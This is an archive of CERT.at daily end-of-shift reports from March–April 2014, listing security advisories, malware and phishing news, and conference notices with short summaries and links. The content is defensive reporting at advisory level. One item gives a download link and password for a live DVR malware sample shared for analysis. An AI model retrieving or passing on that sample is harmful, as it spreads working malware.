Remote Users Obtain Hashed Passwords *** --------------------------------------------- A vulnerability was reported in HP integrated Lights Out (iLO). A remote user can gain obtain hashed passwords. A remote user can invoke the IPMI 2.0 protocol to obtain the target user's salted SHA1 or MD5 hash. The vulnerability resides in the protocol design and is mandated by the IPMI 2.0 specification. --------------------------------------------- http://www.securitytracker.com/id/1029981 *** Extended Random: The PHANTOM NSA-RSA backdoor that never was *** --------------------------------------------- Profs paper was all about attacking Dual EC DRBG, not a Snowden-esque spy bombshell Over the last day or so the security press has been touting stories of a second NSA-induced backdoor in RSAs encryption software BSafe. But it appears to be more sound and fury than substance. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/04/02/extended_ra… *** Safari für Mac OS X: Update schließt Sicherheitslücken und bringt einige Neuerungen *** --------------------------------------------- Der Apple-Webbrowser ist für OS X Mavericks und OS X Mountain Lion in neuen Versionen verfügbar. Neben Patches gegen Sicherheitslücken gibt es Bugfixes und Änderungen an der Benachrichtigungsfunktion. --------------------------------------------- http://www.heise.de/security/meldung/Safari-fuer-Mac-OS-X-Update-schliesst-… *** [2014-04-02] Multiple vulnerabilities in Rhythm File Manager *** --------------------------------------------- An attacker being able to connect to the Android device (e.g. if he uses the same Wireless network), can access arbitrary local files from the device while the File Manager app is being used to stream media. Moreover, a malicious Android app or an attacker being able to connect to the Android device may issue system commands as the user "root" if "root browsing" is enabled. --------------------------------------------- https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014… *** Analysis: Financial cyber threats in 2013. Part 1: phishing *** --------------------------------------------- It has been quite a few years since cybercriminals started actively stealing money from user accounts at online stores, e-payment systems and online banking systems. --------------------------------------------- http://www.securelist.com/en/analysis/204792330/Financial_cyber_threats_in_… *** Bugtraq: [IMF 2014] Call for Participation *** --------------------------------------------- See the program at: http://www.imf-conference.org/imf2014/program.html The conference will take place from Monday, May 12th through Wednesday, May 14th in Münster, Germany. Registration details: http://www.imf-conference.org/imf2014/registration.html --------------------------------------------- http://www.securityfocus.com/archive/1/531707 *** VU#917700: Huawei Echo Life HG8247 optical router XSS vulnerability *** --------------------------------------------- Vulnerability Note VU#917700 Huawei Echo Life HG8247 optical router XSS vulnerability Original Release date: 02 Apr 2014 | Last revised: 02 Apr 2014 Overview Huawei Echo Life HG8247 optical router contains a stored cross-site scripting (XSS) vulnerability Description It has been reported that Huawei Echo Life HG8247 optical routers running software version V1R006C00S120 or earlier contain a stored cross-site scripting (XSS) vulnerability. An unauthenticated attacker can perform a stored --------------------------------------------- http://www.kb.cert.org/vuls/id/917700

1 0

Tageszusammenfassung - Dienstag 1-04-2014
by Daily end-of-shift report 01 Apr '14

01 Apr '14

======================= = End-of-Shift report = ======================= Timeframe: Montag 31-03-2014 18:00 − Dienstag 01-04-2014 18:00 Handler: Robert Waldner Co-Handler: n/a *** Report: RSA endowed crypto product with second NSA-influenced code *** --------------------------------------------- Extended Random like "dousing yourself with gasoline," professor warns. --------------------------------------------- http://feeds.arstechnica.com/~r/arstechnica/security/~3/TbwAXYKTq34/ *** Old School Code Injection in an ATM .dll *** --------------------------------------------- During our last ATM review engagement, we found some interesting executable files that were run by Windows Services under Local System account. These binaries had weak file permissions that allowed us to modify them using the standard ATM user account. As a proof of concept, I decided to inject some code into one of them to take full control of the system. This post is about the technique I used to inject the code into a .dll used by one of the Windows Services. I’m sure there are many --------------------------------------------- http://feedproxy.google.com/~r/SpiderlabsAnterior/~3/CRAp6jZhvVE/injecting-… *** A Look at the GnuTLS X.509 Verification Code Flaw *** --------------------------------------------- ... it was found that the GnuTLS X.509 certificate verification code fails to properly handle certain error conditions that may occur during the certificate verification process. While verifying the certificate, GnuTLS would report it as successful verification of the certificate, even though verification should have resulted in a failure. This means that invalid certificates may be accepted as valid, --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/iSFhF7R9kFI/ *** Creating an intelligent “sandbox” for coordinated malware eradication *** --------------------------------------------- Hello from China where I am presenting on coordinated malware eradication at the 2014 PC Security Labs Information Security Conference. Coordinated malware eradication was also the topic of my last blog. I said the antimalware ecosystem must begin to work with new types of partners if we are going to move from the current state of uncoordinated malware disruption, to a state of coordinated malware eradication. --------------------------------------------- http://blogs.technet.com/b/mmpc/archive/2014/03/31/creating-an-intelligent-… *** Its not the breach that kills you, its the cover-up *** --------------------------------------------- Its how you handle yourself during and after a breach that will determine just how detrimental the breach actually is for your organization. --------------------------------------------- http://feedproxy.google.com/~r/SCMagazineHome/~3/Mi55LWhfA9c/ *** Managing Windows XP’s Risks in a Post-Support World *** --------------------------------------------- There are now less than two weeks left until Microsoft terminates support for the incredibly long-lived Windows XP. Rarely has a tech product lasted as long as XP has – from XP’s launch on October 25, 2001 to its last Patch Tuesday on April 8, 2014 a total of 12 years, 5 months, and two […]Post from: Trendlabs Security Intelligence Blog - by Trend MicroManaging Windows XP’s Risks in a Post-Support World --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/fSwrdK2qOeg/ *** EMC Cloud Tiering Appliance Request Validation Flaw Lets Remote Users View Files *** --------------------------------------------- A vulnerability was reported in EMC Cloud Tiering Appliance. A remote user can view files on the target system. The '/api/login' script does not properly validate user-supplied input. A remote user can supply a specially crafted XML External Entity (XXE) link to view files on target system with root privileges. --------------------------------------------- http://www.securitytracker.com/id/1029979 *** Grazer Linuxtage 2014: "Sicherheit im Netz" mit freier Software *** --------------------------------------------- Alternative Software-Szene lädt an der FH-Joanneum zu Workshops und Vorträgen --------------------------------------------- http://derstandard.at/1395363812795 *** Horde webmail - Open Redirect Vulnerability *** --------------------------------------------- An open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. --------------------------------------------- http://cxsecurity.com/issue/WLB-2014040004 *** ModSecurity HTTP Requests Chunked Encoding Security Bypass Vulnerability *** --------------------------------------------- Martin Holst Swende has reported a vulnerability in ModSecurity, which can be exploited by malicious people to bypass certain security restrictions. The vulnerability is caused due to an error in the "modsecurity_tx_init()" function (apache2/modsecurity.c), which can be exploited to bypass the HTTP request body processing via a specially crafted request using chunked encoding. --------------------------------------------- https://secunia.com/advisories/57444 *** ct-Special "Umstieg auf Linux" am Kiosk erhältlich *** --------------------------------------------- Umsteigen auf Linux – warum nicht? Linux bietet eine Menge Vorteile – nicht nur für XP-Anwender, die demnächst keine Sicherheits-Fixes von Microsoft mehr erhalten. Das neue Sonderheft der ct-Redaktion hilft beim sanften Umstieg von Windows auf Linux. --------------------------------------------- http://www.heise.de/newsticker/meldung/c-t-Special-Umstieg-auf-Linux-am-Kio… *** IBM WebSphere Portal Two Cross-Site Scripting Vulnerabilities *** --------------------------------------------- Two vulnerabilities have been reported in IBM WebSphere Portal, which can be exploited by malicious people to conduct cross-site scripting attacks. --------------------------------------------- https://secunia.com/advisories/57592 *** cPanel Multiple Vulnerabilities *** --------------------------------------------- Two weaknesses, a security issue, and multiple vulnerabilities have been reported in cPanel, which can be exploited by malicious, local users to disclose potentially sensitive information and manipulate certain data, by malicious users to disclose potentially sensitive information, conduct script insertion attacks, manipulate certain data, and compromise a vulnerable system and by malicious people to conduct spoofing and cross-site scripting attacks and bypass certain security restrictions. --------------------------------------------- https://secunia.com/advisories/57576 *** VU#893726: Zyxel P660 series modem/router denial of service vulnerability *** --------------------------------------------- Zyxel P660 series modem/router contains a denial of service vulnerability when parsing a high volume of SYN packets on the web management interface. --------------------------------------------- http://www.kb.cert.org/vuls/id/893726 *** Cisco Security Manager HTTP Header Redirection Vulnerability *** --------------------------------------------- A vulnerability in the web framework of Cisco Security Manager could allow an unauthenticated, remote attacker to inject a crafted HTTP header which will cause a web page redirection to a possible malicious website. The vulnerability is due to insufficient validation user input of user input before using it as an HTTP header value. An attacker could exploit this vulnerability by convincing a user to access a crafted URL. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** Cisco WSA HTTP Header Injection Vulnerability *** --------------------------------------------- A vulnerability in the web framework of Cisco Web Security Appliance (WSA) could allow an unauthenticated, remote attacker to inject a crafted HTTP header that could cause a web page redirection to a possible malicious website. The vulnerability is due to insufficient validation of user input before using it as an HTTP header value. An attacker could exploit this vulnerability by persuading a user to access a crafted URL. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…

1 0

Tageszusammenfassung - Montag 31-03-2014
by Daily end-of-shift report 31 Mar '14

31 Mar '14

======================= = End-of-Shift report = ======================= Timeframe: Freitag 28-03-2014 18:00 − Montag 31-03-2014 18:00 Handler: Robert Waldner Co-Handler: n/a *** Siemens ROS Improper Input Validation *** --------------------------------------------- Researcher Aivar Liimets from Martem Telecontrol Systems reported an improper input validation vulnerability in the Siemens Rugged Operating System (ROS), which could cause a denial-of-service (DoS) condition against the device's management web interface. Siemens coordinated the vulnerability details with NCCIC/ICS-CERT and has provided information for mitigation of the vulnerability.This vulnerability can be exploited remotely. --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-087-01 *** WiFi Bug Plagues Philips Internet-Enabled TVs *** --------------------------------------------- Some versions of Philips internet-enabled SmartTVs are vulnerable to cookie theft and an array of other tricks that abuse a lax WiFi setting. --------------------------------------------- http://threatpost.com/wifi-bug-plagues-philips-internet-enabled-tvs/105119 *** VulDB: Adobe Reader 11.0.06 Sandbox erweiterte Rechte *** --------------------------------------------- Die Schwachstelle wurde am 28.03.2014 von VUPEN via Pwn2Own 2014 publiziert. Die Identifikation der Schwachstelle wird seit dem 20.12.2013 mit CVE-2014-0512 vorgenommen. Sie ist schwierig auszunutzen. Der Angriff kann über das Netzwerk erfolgen. Zur Ausnutzung ist keine spezifische Authentisierung erforderlich. Es sind zwar keine technische Details, jedoch ein privater Exploit zur Schwachstelle bekannt. --------------------------------------------- http://www.scip.ch/?vuldb.12723 *** Adobe Flash Player Bugs Let Remote Users Execute Arbitrary Code *** --------------------------------------------- A remote user can create specially crafted content that, when loaded by the target user on a Windows-based system, will trigger a use-after-free and execute arbitrary code on the target system [CVE-2014-0506]. The code will run with the privileges of the target user. VUPEN reported this vulnerability (via Pwn2Own at CanSecWest 2014). A remote user can create specially crafted content that, when loaded by the target user, will trigger a heap overflow and execute arbitrary code on the target system [CVE-2014-0510]. The code will run with the privileges of the target user. Zeguang Zhao and Liang Chen reported this vulnerability (via Pwn2Own at CanSecWest 2014). --------------------------------------------- http://www.securitytracker.com/id/1029969 --------------------------------------------- (Notiz: soweit wir bisher herausfinden konnten, sind noch keine Exploits dazu "in the wild" aufgetaucht.) --------------------------------------------- *** nginx 1.4.6/1.5.11 Heap-based buffer overflow in the SPDY *** --------------------------------------------- A bug in the experimental SPDY implementation in nginx was found, which might allow an attacker to cause a heap memory buffer overflow in a worker process by using a specially crafted request, potentially resulting in arbitrary code execution (CVE-2014-0133). The problem affects nginx 1.3.15 - 1.5.11, compiled with the ngx_http_spdy_module module (which is not compiled by default) and without --with-debug configure option, if the "spdy" option of the "listen" directive is used in a configuration file. The problem is fixed in nginx 1.5.12, 1.4.7. --------------------------------------------- http://cxsecurity.com/issue/WLB-2014030250 *** Chip.de-Forum offenbar gehackt: 2,5 Millionen Nutzerdaten betroffen *** --------------------------------------------- Forumsmitglieder wurden per Mail über Hack informiert - Passwörter wurden außerdem unzureichend geschützt --------------------------------------------- http://derstandard.at/1395363600546 *** Who's Behind the "BLS Weblearn" Credit Card Scam? *** --------------------------------------------- A new rash of credit and debit card scams involving bogus sub-$15 charges and attributed to a company called "BLS Weblearn" is part of a prolific international scheme designed to fleece unwary consumers. This post delves deeper into the history and identity of the credit card processing network that has been enabling this type of activity for years. --------------------------------------------- http://feedproxy.google.com/~r/KrebsOnSecurity/~3/MxEDIVQPC94/ *** More Device Malware: This is why your DVR attacked my Synology Disk Station, (Mon, Mar 31st) *** --------------------------------------------- Last week, we reported that some of the hosts scanning for port 5000 are DVRs (to be more precise: Hikvision DVRs, commonly used to record video from surveillance cameras [1] ). Today, we were able to recover the malware responsible. You can download the malware here https://isc.sans.edu/diaryimages/hikvision.zip (password: infected) . The malware resides in /dev/cmd.so . A number of additional suspect files where located in the /dev directory which we still need to recover / analyze from the --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17879&rss *** Crack team of cyber warriors arrives to SAVE UK from grid-crippling HACK ATTACKS *** --------------------------------------------- National CERT goes live today The UK is finally getting a national Computer Emergency Response Team (CERT), with the delayed launch of the organisation taking place today. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/03/31/cert_uk_lau… *** Cisco Security Response Team Opens Its Toolbox *** --------------------------------------------- With a variety of security tools, CSIRT is able to detect and analyze malicious traffic throughout the network, including virus propagation, targeted attacks, and commonplace exploits. Because CSIRT continually identifies new security threats, the team needs some historical look-back at what occurred on the network. They also need a solution that can dissect the finer details of security incidents while facing the ever-present restrictions with data storage. --------------------------------------------- https://blogs.cisco.com/security/cisco-security-response-team-opens-its-too…

1 0

Tageszusammenfassung - Freitag 28-03-2014
by Daily end-of-shift report 28 Mar '14

28 Mar '14

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 27-03-2014 18:00 − Freitag 28-03-2014 18:00 Handler: Robert Waldner Co-Handler: n/a *** New PGP keys *** --------------------------------------------- At CERT.at we had to phase out some old 1024 bit DSA keys as well as create new master-signing keys. This turned out to be a major effort. Key roll-overs are never easy.In order to easy the key roll-over pains, we created a key transition document. This document is signed by the old keys in order to prove authorship. ... --------------------------------------------- http://www.cert.at/services/blog/20140328155445-1086.html *** NTP Amplification, SYN Floods Drive Up DDoS Attack Volumes *** --------------------------------------------- The potency of distributed denial of service attacks has increased steadily but dramatically over the last 14 months. --------------------------------------------- http://threatpost.com/ntp-amplification-syn-floods-drive-up-ddos-attack-vol… *** Schneider Electric Serial Modbus Driver Buffer Overflow *** --------------------------------------------- OVERVIEW Carsten Eiram of Risk-Based Security has identified a stack-based buffer overflow vulnerability in Schneider Electric’s Serial Modbus Driver that affects 11 Schneider Electric products. Schneider Electric has produced patches that mitigate this vulnerability. This vulnerability can be exploited remotely. --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-086-01 *** Apple Credential Phishing via appleidconfirm.net, (Thu, Mar 27th) *** --------------------------------------------- ISC user Craig Cox wrote in alerting us of a fairly sophisticated phishing campaign that is currently in progress. The website appleidconfirm.net has a seemingly realistic Apple login page that is being sent out by email. The site even includes JavaScript code which validates your Apple ID as an email in an attempt to obtain only valid credentials. Upon submitting what it considers valid credentials, youre redirected to the /?2 page of the site which contains another form which appears to --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17869&rss *** SonicWALL Email Security Input Validation Flaw in License Management’ and ‘Advanced Pages Permits Cross-Site Scripting Attacks *** --------------------------------------------- A vulnerability was reported in SonicWALL Email Security. A remote user can conduct cross-site scripting attacks. The 'License Management' and 'Advanced' pages do not properly filter HTML code from user-supplied input before displaying the input. A remote user can cause arbitrary scripting code to be executed by the target user's browser. --------------------------------------------- http://www.securitytracker.com/id/1029965 *** Word and Excel Files Infected Using Windows PowerShell *** --------------------------------------------- Malware targeting Word and Excel files has been around for some time, but we recently encountered a new malware family, CRIGENT (also known as “Power Worm”) which brings several new techniques to the table. (We detect these files as W97M_CRIGENT.JER and X97M_CRIGENT.A.) Most significantly, instead of creating or including executable code, CRIGENT uses the Windows PowerShell --------------------------------------------- http://feeds.trendmicro.com/~r/Anti-MalwareBlog/~3/9hUmCpAOj9M/ *** OpenSSH 6.6 bypass SSHFP DNS RR checking by HostCertificate *** --------------------------------------------- I've been looking at handling host keys better, and tripped over this bug. Essentially, if the server offers a HostCertificate that the client doesn't accept, then the client doesn't then check for SSHFP records. --------------------------------------------- http://cxsecurity.com/issue/WLB-2014030239 *** [2014-03-28] Multiple vulnerabilities in Symantec LiveUpdate Administrator *** --------------------------------------------- Attackers are able to compromise Symantec LiveUpdate Administrator at the application and database levels because of vulnerable password reset functionality and SQL injection vulnerabilities. This enables access to credentials of update servers on the network without prior authentication. --------------------------------------------- https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014… *** Python "os._get_masked_mode()" Race Condition Security Issue *** --------------------------------------------- A security issue has been reported in Python, which can be exploited by malicious, local users to potentially disclose or manipulate certain data. The security issue is caused due to a race condition within the "os._get_masked_mode()" function (Lib/os.py), which can be exploited to cause certain application-created files to be world-accessible. The security issue is reported in versions 3.4, 3.3, and 3.2. --------------------------------------------- https://secunia.com/advisories/57672 *** IBM Security Bulletin: IBM Operational Decision Manager and WebSphere ILOG JRules: Multiple security vulnerabilities in IBM JRE *** --------------------------------------------- This Security Bulletin addresses the security vulnerabilities that have shipped with the IBM Java Runtime Environment (JRE) included in IBM Operational Decision Manager and IBM ILOG JRules. IBM ODM and ILOG JRules now include the most recent version of the IBM JRE which fixes the security vulnerabilities reported in Oracles Critical Patch Update releases of January 2014. CVE(s): CVE-2014-0423, CVE-2014-0416 and CVE-2014-0411 Affected product(s) and affected version(s): IBM WebSphere ILOG --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… *** Cisco IOS Software High Priority Queue Denial of Service Vulnerability *** --------------------------------------------- A vulnerability in the packet driver code of Cisco IOS Software could allow an unauthenticated, remote attacker to cause a reload of the affected device, resulting in a denial of service (DoS) condition. CVE-2014-2131 --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014…

1 0

Tageszusammenfassung - Donnerstag 27-03-2014
by Daily end-of-shift report 27 Mar '14

27 Mar '14

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 26-03-2014 18:00 − Donnerstag 27-03-2014 18:00 Handler: Robert Waldner Co-Handler: Alexander Riepl *** Allied Telesis AT-RG634A ADSL router unauthenticated webshell *** --------------------------------------------- Risk: High, Allied Telesis AT-RG634A ADSL Broadband router hidden administrative unauthenticated webshell .. --------------------------------------------- http://cxsecurity.com/issue/WLB-2014030221 *** HP Multiple StoreOnce Products Unauthorised Access Security Bypass Vulnerability *** --------------------------------------------- https://secunia.com/advisories/57601 *** Linux Kernel ath9k "ath_tx_aggr_sleep()" Race Condition Vulnerability *** --------------------------------------------- https://secunia.com/advisories/57468 *** When ZOMBIES attack: DDoS traffic triples as 20Gbps becomes the new normal *** --------------------------------------------- Junk traffic mostly floods in from botnets DDoS traffic has more than trebled since the start of 2013, according to a new study released on Thursday that fingers zombie networks as the primary source of junk traffic that can be used to flood websites. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/03/27/ddos_trends… *** DSA-2885-1 libyaml-libyaml-perl -- security update *** --------------------------------------------- Ivan Fratric of the Google Security Team discovered a heap-based buffer overflow vulnerability in LibYAML, a fast YAML 1.1 parser and emitter library. A remote attacker could provide a specially-crafted YAML document that, when parsed by an application using libyaml, would cause the application to crash or, potentially, execute arbitrary code with the privileges of the user running the application. --------------------------------------------- https://www.debian.org/security/2014/dsa-2885 *** Cisco Event Response: Semiannual Cisco IOS Software Security Advisory Bundled Publication *** --------------------------------------------- Cisco released its semiannual Cisco IOS Software Security Advisory Bundled Publication on March 26, 2014. In direct response to customer feedback, Cisco releases bundles of Cisco IOS Software Security Advisories on the fourth Wednesday of the month in March and September of each calendar year. The publication includes 5 Security Advisories that address vulnerabilities in Cisco IOS Software and 1 Security Advisory that addresses .. --------------------------------------------- http://www.cisco.com/web/about/security/intelligence/Cisco_ERP_mar14.html *** Malware Hijacks Android Mobile Devices to Mine Cryptocurrency *** --------------------------------------------- Several bits of malware targeting Android mobile devices hijack the smartphone or tablets resources to mine digital currency such as Litecoin or Dogecoin. --------------------------------------------- http://threatpost.com/malware-hijacks-android-mobile-devices-to-mine-crypto…

1 0

Tageszusammenfassung - Donnerstag 27-03-2014
by Daily end-of-shift report 27 Mar '14

27 Mar '14

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 25-03-2014 18:00 − Mittwoch 26-03-2014 18:00 Handler: Robert Waldner Co-Handler: n/a *** A few updates on "The Moon" worm, (Tue, Mar 25th) *** --------------------------------------------- It has been over a month since we saw the "Moon" worm first exploiting various Linksys routers. I think it is time for a quick update to summarize some of the things we learned since then: Much of what we found so far comes thanks to the malware analysis done by Bernado Rodriges. Bernado used QEMU to run the code in a virtual environment. QEMU is as far as I know the only widely available virtualization technique that can simulate a MIPS CPU while running on an x86 host. --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17855&rss *** WordPress Pingback-Funktion für DDoS-Attacken missbraucht *** --------------------------------------------- WordPress Pingback-Funktion für DDoS-Attacken missbraucht24. März 2014 In den letzten Tagen gab es zahlreiche Medienberichte zu DDoS-Angriffen durch Missbrauch der XML-RPC-Pingback-Funktion von WordPress. Einige dieser Beiträge möchte ich, zur weiterführenden Lektüre für Betroffene und Interessierte, im Folgenden auflisten. Blog Post von Daniel Cid vom Security-Dienstleister Sucuri mit Erklärungen zur Funktionsweise der Attacke. Weiters wird beschrieben, --------------------------------------------- http://www.cert.at/services/blog/20140324230619-1079.html *** Bugtraq: CVE-2013-6955 Synology DSM remote code execution *** --------------------------------------------- webman/imageSelector.cgi in Synology DiskStation Manager (DSM) 4.0 before 4.0-2259, 4.2 before 4.2-3243, and 4.3 before 4.3-3810 Update 1 allows remote attackers to append data to arbitrary files, and consequently execute arbitrary code, via a pathname in the SLICEUPLOAD X-TMP-FILE HTTP header. --------------------------------------------- http://www.securityfocus.com/archive/1/531602 *** OpenSSL 1.0.0l cache side-channel attack *** --------------------------------------------- Topic: OpenSSL 1.0.0l cache side-channel attack Risk: Medium Text:The Montgomery ladder implementation in OpenSSL through 1.0.0l does not ensure that certain swap operations have a constant-tim... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014030197 *** Xen HVMOP_set_mem_access Input Validation Flaw Lets Local Guest Users Deny Service on the Host System *** --------------------------------------------- A local user on the guest operating system can cause denial of service conditions on the host operating system. The HVMOP_set_mem_access HVM control operations does not properly validate input size. A local administrative user on an HVM guest operating system can consume excessive CPU resources on the host operating system. On version 4.2, only 64-bit versions of the hypervisor are affected. Device model emulators (qemu-dm) are affected. --------------------------------------------- http://www.securitytracker.com/id/1029956 *** Walkthrough of a Recent Zbot Infection and associated CnC Server *** --------------------------------------------- During routine ThreatLabZ log analysis, we encountered the following malicious Zbot executable connecting back to its CnC and exfiltrating data via POST requests. --------------------------------------------- http://feedproxy.google.com/~r/zscaler/research/~3/kygTD5dMmHo/walkthrough-… *** MIT Researchers Create Platform To Build Secure Web Apps That Never Leak Data *** --------------------------------------------- rjmarvin writes: "Researchers in the MIT Computer Science and Artificial Intelligence Laboratory have developed a platform for building secure web applications and services that never decrypt or leak data. MIT researcher Raluca Ada Popa, who previously worked on the Google and SAP-adopted CryptoDB, and her team, have put a longstanding philosophy into practice: to never store unencrypted data on servers. Theyve redesigned the entire approach to securing online data by creating Mylar, which --------------------------------------------- http://rss.slashdot.org/~r/Slashdot/slashdot/~3/QIuCSrAxslY/story01.htm *** PAM timestamp internals bypass authentication *** --------------------------------------------- Topic: PAM timestamp internals bypass authentication Risk: Low Text:Hi When playing with some PAM modules for my own projects, I came across some implications of pam_timestamp (which is part ... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014030216 *** Nmap-Erfinder rebootet Full Disclosure *** --------------------------------------------- Gordon 'Fyodor' Lyon hat die überraschend geschlossene Full-Disclosure-Mailingliste wiederbelebt. Er habe viel Erfahrung mit dem Administrieren von Mailinglisten und keine Angst vor rechtlichen Drohungen, sagt der Sicherheitsexperte. --------------------------------------------- http://www.heise.de/security/meldung/Nmap-Erfinder-rebootet-Full-Disclosure… *** TYPO3 CMS 6.2 LTS is now available *** --------------------------------------------- ... TYPO3 CMS 6.2 LTS, which was released today. As the second TYPO3 release with long-term support (LTS), TYPO3 CMS 6.2 LTS will receive at least three years of support from the development team behind the open-source software. --------------------------------------------- http://typo3.org/news/article/typo3-presents-the-latest-version-of-its-free… *** Jetzt VoIP-Passwort ändern: Kriminelle nutzen erbeutete Fritzbox-Daten aus *** --------------------------------------------- Die Fritzbox-Angreifer haben anscheinend lange Zeit unbemerkt Zugangsdaten gesammelt, ohne sie zu benutzen. Für die Nutzer hat das jetzt ein übles Nachspiel, denn die meisten Passwörter funktionieren weiterhin. Der Schaden geht in die Hunderttausende. --------------------------------------------- http://www.heise.de/security/meldung/Jetzt-VoIP-Passwort-aendern-Kriminelle… *** Splunk Unspecified Cross-Site Scripting Vulnerability *** --------------------------------------------- A vulnerability has been reported in Splunk, which can be exploited by malicious people to conduct cross-site scripting attacks. Certain unspecified input is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. The vulnerability is reported in versions prior to 5.0.8. --------------------------------------------- https://secunia.com/advisories/57554 *** libcURL Connection Re-use and Certificate Verification Security Issues *** --------------------------------------------- Multiple security issues have been reported in libcURL, which can be exploited by malicious people to conduct spoofing attacks and bypass certain security restrictions. --------------------------------------------- https://secunia.com/advisories/57434 *** 10 rules of thumb of internet safety *** --------------------------------------------- Malicious parties on the internet try to gain access to your computer, tablet or mobile phone and to intercept personal data. Malware, phishing and spam are frequently occurring threats. These 10 rules of thumb provide a basis to protect yourself against these threats. --------------------------------------------- http://www.ncsc.nl/english/services/expertise-advice/knowledge-sharing/fact… *** New Metasploit 4.9 Helps Evade Anti-Virus Solutions, Test Network Segmentation, and Increase Productivity for Penetration Testers *** --------------------------------------------- Metasploit 4.9 helps penetration testers evade anti-virus solutions, generate payloads, test network segmentation, and generally increase productivity through updated automation and reporting features. Since version 4.8, Metasploit has added 67 new exploits and 51 auxiliary and post-exploitation modules to both its commercial and open source editions, bringing our total module count up to 1,974. The new version is available immediately. --------------------------------------------- https://community.rapid7.com/community/metasploit/blog/2014/03/26/new-metas… *** [Honeypot Alert] JCE Joomla Extension Attacks *** --------------------------------------------- Our web honeypots picked up some increased exploit attempts for an old Joomla Content Editor (JCE) Extension vulnerability. Although this vulnerability is a few years old, botnet owners are heavily scanning for sites that are vulnerable and attempting to exploit them. --------------------------------------------- http://feedproxy.google.com/~r/SpiderlabsAnterior/~3/v7CME1mpcfQ/honeypot-a… *** Cisco IOS Software SSL VPN Denial of Service Vulnerability *** --------------------------------------------- A vulnerability in the Secure Sockets Layer (SSL) VPN subsystem of Cisco IOS Software could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition. The vulnerability is due to a failure to process certain types of HTTP requests. To exploit the vulnerability, an attacker could submit crafted requests designed to consume memory to an affected device. An exploit could allow the attacker to consume and fragment memory on the affected device. This may cause reduced performance, a failure of certain processes, or a restart of the affected device. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Cisco IOS Software Session Initiation Protocol Denial of Service Vulnerability *** --------------------------------------------- A vulnerability in the Session Initiation Protocol (SIP) implementation in Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of an affected device. To exploit this vulnerability, affected devices must be configured to process SIP messages. Limited Cisco IOS Software and Cisco IOS XE Software releases are affected. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Cisco IOS Software Crafted IPv6 Packet Denial of Service Vulnerability *** --------------------------------------------- A vulnerability in the implementation of the IP version 6 (IPv6) protocol stack in Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause I/O memory depletion on an affected device that has IPv6 enabled. The vulnerability is triggered when an affected device processes a malformed IPv6 packet. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Cisco IOS Software Network Address Translation Vulnerabilities *** --------------------------------------------- The Cisco IOS Software implementation of the Network Address Translation (NAT) feature contains two vulnerabilities when translating IP packets that could allow an unauthenticated, remote attacker to cause a denial of service condition. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Cisco IOS Software Internet Key Exchange Version 2 Denial of Service Vulnerability *** --------------------------------------------- A vulnerability in the Internet Key Exchange Version 2 (IKEv2) module of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to cause a reload of the affected device that would lead to a denial of service (DoS) condition. The vulnerability is due to how an affected device processes certain malformed IKEv2 packets. An attacker could exploit this vulnerability by sending malformed IKEv2 packets to an affected device to be processed. An exploit could allow the attacker to cause a reload of the affected device that would lead to a DoS condition. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-… *** Web Browser Security Revisited (Part 5) *** --------------------------------------------- In Part 1 of this series, we discussed the importance of web browser security and some security-related issues that are common to all or many of the popular browsers today. In Part 2, we talked about some specific security mechanisms that are built into Internet Explorer and how they're implemented. In Part 3, we looked at how to configure IE for best security. In Part 4, we examined how to do the same with Google Chrome. This time, we'll look at ... Chrome for Business. --------------------------------------------- http://www.windowsecurity.com/articles-tutorials/Web_Application_Security/w… *** Vuln: Apple Mac OS X APPLE-SA-2014-02-25-1 Multiple Security Vulnerabilities *** --------------------------------------------- Apple Mac OS X is prone to multiple vulnerabilities. The update addresses new vulnerabilities that affect ATS, CFNetwork Cookies, CoreAnimation, CoreText, Date and Time, curl, QuickTime, QuickLook, Finder, and File Bookmark components. Attackers can exploit these issues to execute arbitrary code, gain unauthorized access, bypass security restrictions, and perform other attacks. Failed attacks may cause denial-of-service conditions. These issues affect OS X versions prior to 10.9.2. --------------------------------------------- http://www.securityfocus.com/bid/65777

1 0

Tageszusammenfassung - Dienstag 25-03-2014
by Daily end-of-shift report 25 Mar '14

25 Mar '14

